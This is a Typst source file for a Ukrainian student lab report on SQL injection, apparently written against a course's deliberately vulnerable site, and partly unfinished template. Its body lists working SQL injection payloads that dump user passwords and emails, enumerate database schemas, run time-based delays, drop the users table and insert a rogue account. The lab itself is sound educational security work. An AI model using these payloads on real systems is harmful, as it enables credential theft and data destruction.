php-vulnerabilities/lab.typ

#import "@local/nure:0.1.0": *

#show: pz-lb.with(..yaml("doc.yaml"), title: [SQL-ІН'ЄКЦІЇ], worknumber: 2)

#v(-spacing)

== Мета роботи
Ознайомитися з вразливостями типу "ін’єкції", зокрема SQL-ін'єкції.

== Хід роботи
#v(-spacing)

vulnerability.linerds.us/products

IN PRODUCT SEARCH
`' OR 1=1 --`
`' UNION select password, password, email from users;`
`' or id=2; -- select item with Nth(2nd) id`
`' UNION SELECT group_concat('email: ', email, ' passw: ', password), 1, 2 from users -- `
`' UNION SELECT password, username, email from users where email like '%admin%'; -- `
`' union select TABLE_NAME,1,2 from INFORMATION_SCHEMA.TABLES; # `
`' union select SCHEMA_NAME, 1,2 from INFORMATION_SCHEMA.SCHEMATA; # `
`' union select BENCHMARK(500000, AES_DECRYPT(AES_ENCRYPT(REPEAT("a",3000), "key"), "key")), 2, 3; # `
#figure(image("waiting_50s.png"), caption: [Результат SQL ін'єкції на основі часу]) // TODO: caption

IN ADD PRODUCT
`3); drop table users; `
`-1); insert into users(username, email, password) values ('hacker2222', 'mail\@hackerr.com' , 'pass'); -- `
`'1'); DO SLEEP(5); #`
// === Підготовка
// #lorem(150)

// === Виконання дослідження
// #lorem(300)

// === Підрахунок результатів
// #lorem(250)

== Висновки

// == Контрольні запитання
// #lorem(100):
// - #lorem(20);
// - #lorem(30);
// - #lorem(15);
// - #lorem(25);
// - #lorem(42);
// - #lorem(27).

#show: appendices_style

// = Quote
// #link("https://youtu.be/bJQj1uKtnus")[
//   The art isn't the art, the art is never the art,
//   the art is the thing that happens inside you when you make it and the feeling in the heart of the beholder.
// ]


// = Приклад звіту 1
// #v(-spacing)
// == Частина 1
// #lorem(100)
// == Частина2
// #lorem(200)
//
// = Приклад звіту 2
// #lorem(200)
//
// = Приклад звіту 3
// #lorem(200)